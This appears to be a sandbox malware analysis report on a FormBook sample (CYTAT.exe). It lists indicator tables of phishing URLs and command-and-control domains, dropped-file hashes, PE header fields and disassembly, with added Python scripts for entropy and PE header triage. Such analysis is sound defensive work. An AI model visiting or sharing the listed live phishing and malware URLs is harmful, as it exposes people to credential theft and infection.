63.250.47.40 | Cotizaci#U00f3n.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | ES-241-29335_pdf.exe | malicious | FormBook | www.brupack.online/t8b6/
63.250.47.40 | PO# Q919240.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | PAGO $830.900.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.balclub.top/n6ow/
63.250.47.40 | PO #86637.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | COTIZACION 290824.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | ORDER_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
63.250.47.40 | ORDER_38746_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.dyme.tech | Cotizaci#U00f3n.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | PAGO $830.900.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | New Purchase Order.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | New Purchase Order.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | Scan 00093847.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | doc330391202408011.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | PO #86637.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240665_2024.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | COTIZACION 290824.exe | malicious | FormBook | 13.248.169.48
webredir.vip.gandi.net | Cotizaci#U00f3n.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | ES-241-29335_pdf.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RECIEPT.PDF.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO# Q919240.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO098765678.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PAGO $830.900.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | FATURALAR PDF.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Order#Qxz091124.exe | malicious | FormBook | 217.70.184.50
www.elsupertodo.net | Cotizaci#U00f3n.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | PO# Q919240.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | PAGO $830.900.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | PO #86637.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174
www.elsupertodo.net | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174
www.kexweb.top | Cotizaci#U00f3n.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | PO# Q919240.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | PAGO $830.900.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | PO #86637.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | COTIZACION 290824.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | ORDER_pdf.exe | malicious | FormBook | 63.250.47.40
www.kexweb.top | ORDER_38746_pdf.exe | malicious | FormBook | 63.250.47.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATT-INTERNET4US | SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf | malicious | Unknown | 107.130.227.220
ATT-INTERNET4US | https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 13.32.27.28
ATT-INTERNET4US | http://pub-606ae465ae6543a4a6f9f5ba82186af6.r2.dev/dd.html | malicious | HTMLPhisher | 13.32.27.77
ATT-INTERNET4US | http://pub-732f20a7195c4bc4b1d41a214679e58c.r2.dev/telegram.html | malicious | HTMLPhisher | 13.32.27.129
ATT-INTERNET4US | http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.html | malicious | Greatness Phishing Kit, HTMLPhisher | 13.32.27.44
ATT-INTERNET4US | http://www.flow.page/juno-0/ | malicious | Unknown | 13.32.27.35
ATT-INTERNET4US | http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.html | malicious | Greatness Phishing Kit, HTMLPhisher | 13.32.27.129
ATT-INTERNET4US | http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.html | malicious | Greatness Phishing Kit, HTMLPhisher | 13.32.27.44
ATT-INTERNET4US | http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.html | malicious | Greatness Phishing Kit, HTMLPhisher | 13.32.27.129
ATT-INTERNET4US | http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.html | malicious | Unknown | 13.32.27.44
AMAZON-02US | https://auth.securetnet.com/44850b/fb7c75ee-a59f-4721-a974-2d0b2fad0b9b | malicious | Unknown | 3.64.230.138
AMAZON-02US | SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf | malicious | Unknown | 52.93.142.158
AMAZON-02US | Meeting-037-911.one | malicious | HTMLPhisher | 18.245.46.55
AMAZON-02US | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 54.67.87.110
AMAZON-02US | https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 18.244.18.32
AMAZON-02US | RFQ urrgently.exe | malicious | FormBook | 108.128.197.171
AMAZON-02US | https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyU | malicious | HTMLPhisher | 3.161.82.28
AMAZON-02US | http://pub-578040898e97448fab462cfa3f671292.r2.dev/gytdindex.html | malicious | HTMLPhisher | 3.70.101.28
AMAZON-02US | http://pub-28b78cc368104fdfb2ea280368fa70b5.r2.dev/ihil.html | malicious | HTMLPhisher | 18.192.231.252
AMAZON-02US | http://juno-online7373h.wixsite.com/my-site/ | malicious | Unknown | 54.171.122.26
HOSTNETNL | Cotizaci#U00f3n.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | PAGO $830.900.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | FATURALAR PDF.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | PASU5160894680 DOCS.scr.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 91.184.0.111
HOSTNETNL | firmware.x86_64.elf | malicious | Unknown | 91.184.0.99
HOSTNETNL | PO #86637.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | DEBIT NOTE July 2024 PART 2.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | COTIZACION 290824.exe | malicious | FormBook | 91.184.0.200
HOSTNETNL | ORDER_pdf.exe | malicious | FormBook | 91.184.0.200
NAMECHEAP-NETUS | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 162.213.249.216
NAMECHEAP-NETUS | QlHhDu2uh1.exe | malicious | FormBook | 162.0.238.43
NAMECHEAP-NETUS | RFQ urrgently.exe | malicious | FormBook | 162.0.236.169
NAMECHEAP-NETUS | https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/index.html | malicious | Unknown | 199.192.20.176
NAMECHEAP-NETUS | https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/ | malicious | Unknown | 199.192.20.176
NAMECHEAP-NETUS | https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN | malicious | Unknown | 199.192.20.176
NAMECHEAP-NETUS | RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | https://lender-abang.pages.dev/ | malicious | Unknown | 162.213.255.57
NAMECHEAP-NETUS | https://telegram-message-8n5.pages.dev/ | malicious | Unknown | 162.213.255.57
NAMECHEAP-NETUS | https://arabuserseg.net/pp/xzw | malicious | Unknown | 199.188.205.199
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\netbtugc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:modified
                                              Size (bytes):196608
                                              Entropy (8bit):1.1215420383712111
                                              Encrypted:false
                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\CYTAT.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):286720
                                              Entropy (8bit):7.994326022010796
                                              Encrypted:true
                                              SSDEEP:6144:0k60OS9LoRfeBnpkq60jqYTRwU3irOc3tkLk9Kga/rCTxx:o7S98fypkqp9113iX3Ik9NaTCTxx
                                              MD5:A29D680488904B6E9BBE62B436214F1A
                                              SHA1:9F06D1E3633535C2CF4BA5DFE015D6B79311D935
                                              SHA-256:E4662D5FAF01AE2F0E86BE7DD5250B6919579BB09BF77F6ED7CE62E80F979DBE
                                              SHA-512:B5AE5F82E1061304311D392CA539658B9EA6909D6FCCD71F3F05E41DFE07329633F7EAF219DCF0AD0F97584F74F6ED44CAE76FB40A7A810010A1380332105B1F
                                              Malicious:false
                                              Reputation:low
                                              Preview:x....9X5H...D...s.0Q..d6E...9X5HTW0MNM00OA0R5GPL5MBHF9X5HT.0MNC/.AA.[.f.My.c..P+.8&8W?/ .S./^=Ag2).?7&fP6..... !)U.BL:v5GPL5MB1G0..(3..-)..P(.*...j,R.X...dU/.M..qPW..Y1]z0+.MBHF9X5H..0M.L10....5GPL5MBH.9Z4CU\0M.I00OA0R5GP\!MBHV9X5(PW0M.M0 OA0P5GVL5MBHF9^5HTW0MNMP4OA2R5GPL5OB..9X%HTG0MNM 0OQ0R5GPL%MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X.<1/DMNMT|KA0B5GP.1MBXF9X5HTW0MNM00Oa0RUGPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL
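The two dropped-file records above show how the sandbox separates a modified SQLite database (entropy 1.12, Encrypted: false) from a 286720-byte blob written by CYTAT.exe (entropy 7.994, Encrypted: true). The script below is an added example for this page, not Joe Sandbox code: it reproduces the 8-bit Shannon entropy figure, applies an assumed 7.9 cut-off (the report does not state the threshold it uses), and adds a per-window scan, which catches a high-entropy payload padded into a mostly-zero container that the whole-file figure would miss. All inputs are constructed here; the filler is a SHA-256 chain standing in for ciphertext, and the same test cannot tell compression from encryption.

```python
"""Reproduce the 'Entropy (8bit)' and 'Encrypted' fields the report attaches
to dropped files, and add a sliding-window scan on top.

Added example for this page, not Joe Sandbox code. The byte strings are
constructed here; the 7.9 'encrypted' threshold is an assumption, the
report does not state the cut-off it applies.
"""
import hashlib
import math
from collections import Counter

ENCRYPTED_THRESHOLD = 7.9  # assumed; the report shows 7.994 -> true, 1.12 -> false

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 (a single symbol) up to 8.0 (all 256 values uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """Whole-file verdict, the same idea as the report's Encrypted flag.
    Compressed data and ciphertext are indistinguishable by this test."""
    return shannon_entropy(data) >= threshold

def high_entropy_windows(data: bytes, window: int = 4096, threshold: float = 7.5):
    """Offsets of fixed-size windows whose entropy crosses the threshold.
    A payload embedded in a mostly-zero container keeps the whole-file
    figure low, which is why a per-window scan is worth running as well."""
    return [off for off in range(0, len(data) - window + 1, window)
            if shannon_entropy(data[off:off + window]) >= threshold]

def pseudo_random_bytes(seed: bytes, length: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) so the example runs
    offline and reproducibly; it stands in for ciphertext."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:length])

# Constructed inputs: a sparse SQLite-like file (mostly zero pages), a
# 32 KiB filler blob, and 8 KiB of that blob sandwiched between zero runs.
SPARSE_DB = (b"SQLite format 3\x00" + b"\x00" * 4000
             + b"CREATE TABLE logins" + b"\x00" * 4000)
RANDOM_BLOB = pseudo_random_bytes(b"example-seed", 32768)
CONTAINER = b"\x00" * 8192 + RANDOM_BLOB[:8192] + b"\x00" * 8192

if __name__ == "__main__":
    for name, blob in (("sparse db", SPARSE_DB), ("blob", RANDOM_BLOB),
                       ("container", CONTAINER)):
        print(f"{name:10s} entropy={shannon_entropy(blob):.4f} "
              f"encrypted={looks_encrypted(blob)}")
    print("high-entropy windows in container:", high_entropy_windows(CONTAINER))
```

For the container the whole-file entropy stays well under the threshold while the window scan reports the two 4 KiB windows at offsets 8192 and 12288, which is the case a triage script should not miss.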
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.539006549749381
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CYTAT.exe
                                              File size:1'357'205 bytes
                                              MD5:a1eecc39c791b5a57c0e914b116a1672
                                              SHA1:c5deba202f4187bcde6d16af9fb74badafe1abe3
                                              SHA256:502812cc0e25d2c5e3053cb724b38407b6ba9e2ef6c0631d89879602365fd2a8
                                              SHA512:9f023cae995268381887a2a7a13b4191c6c7ae641c99ecd8225c7833ba0dccd45d0d34c061a5ffa8b3d84113dff56d60d1867310e4ed9f6fef6e07c24c3c36e1
                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCduxnPJrGgH3fNoS3eIxnXHW5SkrwA:7JZoQrbTFZY1iaC0xnPJzXfNoS3eIlGZ
                                              TLSH:3A55F222B5C69036C2B323B19EBEF769963D79360336D29737C82D315EA05416B39723
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                              Icon Hash:1733312925935517
                                              Entrypoint:0x4165c1
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
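The static fields above come straight from the COFF file header and the optional header: the 2012 timestamp is the raw TimeDateStamp, and the two flag lists are bitmasks. The script below is an added example for this page, not Joe Sandbox code. It parses those headers with the standard library, decodes the flags, and flags the hardening gaps this combination implies: RELOCS_STRIPPED together with no DYNAMIC_BASE means the image always maps at its preferred base 0x400000, and no NX_COMPAT means the executable does not opt into DEP. The sample header is constructed from the values the report lists (it is not the bytes of CYTAT.exe), and the flag tables cover only the bits most relevant to triage.

```python
"""Decode PE static fields (timestamp, Image File Characteristics, DLL
Characteristics, entry point, image base) from raw headers and flag the
hardening gaps they imply.

Added example for this page, not Joe Sandbox code. Only the DOS header, the
COFF file header and the fixed part of the optional header are parsed. The
sample header is constructed from the values the report lists and is not the
bytes of CYTAT.exe.
"""
import datetime
import struct

IMAGE_FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}

def _flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]

def parse_pe_header(blob: bytes) -> dict:
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, nsections, tstamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", blob, fh)
    oh = fh + 20                                        # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", blob, oh)
    (entry,) = struct.unpack_from("<I", blob, oh + 16)  # AddressOfEntryPoint (RVA)
    if magic == 0x10B:                                  # PE32
        (image_base,) = struct.unpack_from("<I", blob, oh + 28)
    elif magic == 0x20B:                                # PE32+
        (image_base,) = struct.unpack_from("<Q", blob, oh + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    os_major, os_minor = struct.unpack_from("<HH", blob, oh + 40)
    ss_major, ss_minor = struct.unpack_from("<HH", blob, oh + 48)
    subsystem, dll_chars = struct.unpack_from("<HH", blob, oh + 68)
    ts = datetime.datetime.fromtimestamp(tstamp, tz=datetime.timezone.utc)
    return {
        "machine": MACHINES.get(machine, f"{machine:#06x}"),
        "sections": nsections,
        "timestamp": ts.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": _flags(chars, IMAGE_FILE_CHARACTERISTICS),
        "entry_point": entry, "image_base": image_base,
        "os_version": (os_major, os_minor), "subsystem_version": (ss_major, ss_minor),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
    }

def hardening_gaps(info: dict) -> list:
    """Mitigations a triage script should report as absent. RELOCS_STRIPPED
    plus no DYNAMIC_BASE means the image always loads at its preferred base."""
    gaps = []
    if "DYNAMIC_BASE" not in info["dll_characteristics"]:
        gaps.append("no DYNAMIC_BASE (ASLR not requested)")
    if "NX_COMPAT" not in info["dll_characteristics"]:
        gaps.append("no NX_COMPAT (DEP not requested)")
    if "RELOCS_STRIPPED" in info["characteristics"]:
        gaps.append("RELOCS_STRIPPED (image cannot be rebased)")
    return gaps

def build_pe32_header(timestamp, characteristics, entry, image_base,
                      subsystem, dll_chars, os_ver=(5, 0), ss_ver=(5, 0)) -> bytes:
    """Minimal DOS + PE32 headers with no sections, for exercising the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)               # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x014C, 1, timestamp, 0, 0, 224, characteristics)
    opt = bytearray(224)                                # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<HH", opt, 40, *os_ver)
    struct.pack_into("<HH", opt, 48, *ss_ver)
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)

# Constructed from the report's static values for CYTAT.exe:
# 0x0123 = RELOCS_STRIPPED | EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | 32BIT_MACHINE,
# 0x8000 = TERMINAL_SERVER_AWARE only.
SAMPLE_HEADER = build_pe32_header(timestamp=0x4F25BAEC, characteristics=0x0123,
                                  entry=0x4165C1, image_base=0x400000,
                                  subsystem=2, dll_chars=0x8000)

if __name__ == "__main__":
    info = parse_pe_header(SAMPLE_HEADER)
    for key, value in info.items():
        print(f"{key:22s} {value}")
    print("gaps:", hardening_gaps(info))
```

Run against a real file, read the first few kilobytes and pass them in; the timestamp is attacker-controlled (a linker or packer can write anything), so treat it as a pivot for clustering, not as a build date.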
                                              Instruction
                                              call 00007F89917112EBh
                                              jmp 00007F899170815Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push edi
                                              push esi
                                              mov esi, dword ptr [ebp+0Ch]
                                              mov ecx, dword ptr [ebp+10h]
                                              mov edi, dword ptr [ebp+08h]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F89917082DAh
                                              cmp edi, eax
                                              jc 00007F8991708476h
                                              cmp ecx, 00000080h
                                              jc 00007F89917082EEh
                                              cmp dword ptr [004A9724h], 00000000h
                                              je 00007F89917082E5h
                                              push edi
                                              push esi
                                              and edi, 0Fh
                                              and esi, 0Fh
                                              cmp edi, esi
                                              pop esi
                                              pop edi
                                              jne 00007F89917082D7h
                                              jmp 00007F89917086B2h
                                              test edi, 00000003h
                                              jne 00007F89917082E6h
                                              shr ecx, 02h
                                              and edx, 03h
                                              cmp ecx, 08h
                                              jc 00007F89917082FBh
                                              rep movsd
                                              jmp dword ptr [00416740h+edx*4]
                                              mov eax, edi
                                              mov edx, 00000003h
                                              sub ecx, 04h
                                              jc 00007F89917082DEh
                                              and eax, 03h
                                              add ecx, eax
                                              jmp dword ptr [00416654h+eax*4]
                                              jmp dword ptr [00416750h+ecx*4]
                                              nop
                                              jmp dword ptr [004166D4h+ecx*4]
                                              nop
                                              inc cx
                                              add byte ptr [eax-4BFFBE9Ah], dl
                                              inc cx
                                              add byte ptr [ebx], ah
                                              ror dword ptr [edx-75F877FAh], 1
                                              inc esi
                                              add dword ptr [eax+468A0147h], ecx
                                              add al, cl
                                              jmp 00007F8993B80AD7h
                                              add esi, 03h
                                              add edi, 03h
                                              cmp ecx, 08h
                                              jc 00007F899170829Eh
                                              rep movsd
                                              jmp dword ptr [00000000h+edx*4]
                                              Programming Language:
                                              • [ C ] VS2010 SP1 build 40219
                                              • [C++] VS2010 SP1 build 40219
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8d41c          0x154         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xab000          0x9328        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x82000          0x844         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8061c      | 0x80800  | 61ffce4768976fa0dd2a8f6a97b1417a | False    | 0.5583182605787937  | data      | 6.684690148171278  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000         | 0xdfc0       | 0xe000   | 0354bc5f2376b5e9a4a3ba38b682dff1 | False    | 0.36085728236607145 | data      | 4.799741132252136  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x90000         | 0x1a758      | 0x6800   | 8033f5a38941b4685bc2299e78f31221 | False    | 0.15324519230769232 | data      | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xab000         | 0x9328       | 0x9400   | 495451d7eb8326bd9fa2714869ea6de8 | False    | 0.49002322635135137 | data      | 5.541804843154628  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
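The Entropy and ZLIB Complexity columns in the section table above are the two numbers an analyst reads first when deciding whether a section holds packed or encrypted content. The following Python is an added example, not Joe Sandbox code: it computes Shannon entropy (bits per byte) and the compressed-to-raw size ratio for a section body and applies the usual triage heuristic. It assumes that "ZLIB Complexity" in the report is the zlib compressed size divided by the raw size; the 7.0 entropy threshold is a common rule of thumb, not a fixed rule. The two section bodies it runs on are constructed test data, not bytes from CYTAT.exe. Note that this sample's .text sits at 6.68, below the threshold, which is consistent with ordinary compiled code rather than a packed stub.

```python
import hashlib
import math
import zlib


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed size / raw size. Assumption: this is what the report's
    'ZLIB Complexity' column measures. Near 1.0 means incompressible
    (encrypted or packed); near 0.0 means highly redundant (e.g. zero-filled)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage_section(name: str, data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Summarise one section like the table above and flag bodies that look
    packed or encrypted: high entropy AND poor compressibility. Either signal
    alone is weak (a large icon resource can be high-entropy but compressible)."""
    ent = shannon_entropy(data)
    ratio = zlib_complexity(data)
    return {
        "name": name,
        "raw_size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "entropy": round(ent, 4),
        "zlib_complexity": round(ratio, 4),
        "suspect_packed": ent > entropy_threshold and ratio > 0.9,
    }


def pseudo_random(n: int) -> bytes:
    """Deterministic, incompressible filler (SHA-256 chain) standing in for an
    encrypted/packed section body. Constructed test data only."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples: a zero-filled .data-like body and a packed-looking one.
SAMPLE_SECTIONS = {
    ".data": bytes(0x1000),
    ".packed": pseudo_random(0x1000),
}

if __name__ == "__main__":
    for section_name, body in SAMPLE_SECTIONS.items():
        print(triage_section(section_name, body))
```

To apply it to a real PE, feed each section's raw bytes (for example `section.get_data()` from pefile) to `triage_section`; the MD5 it returns should then match the MD5 column of the report for the same section.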
Name          | RVA     | Size   | Type                                                                                  | Language | Country       | ZLIB Complexity
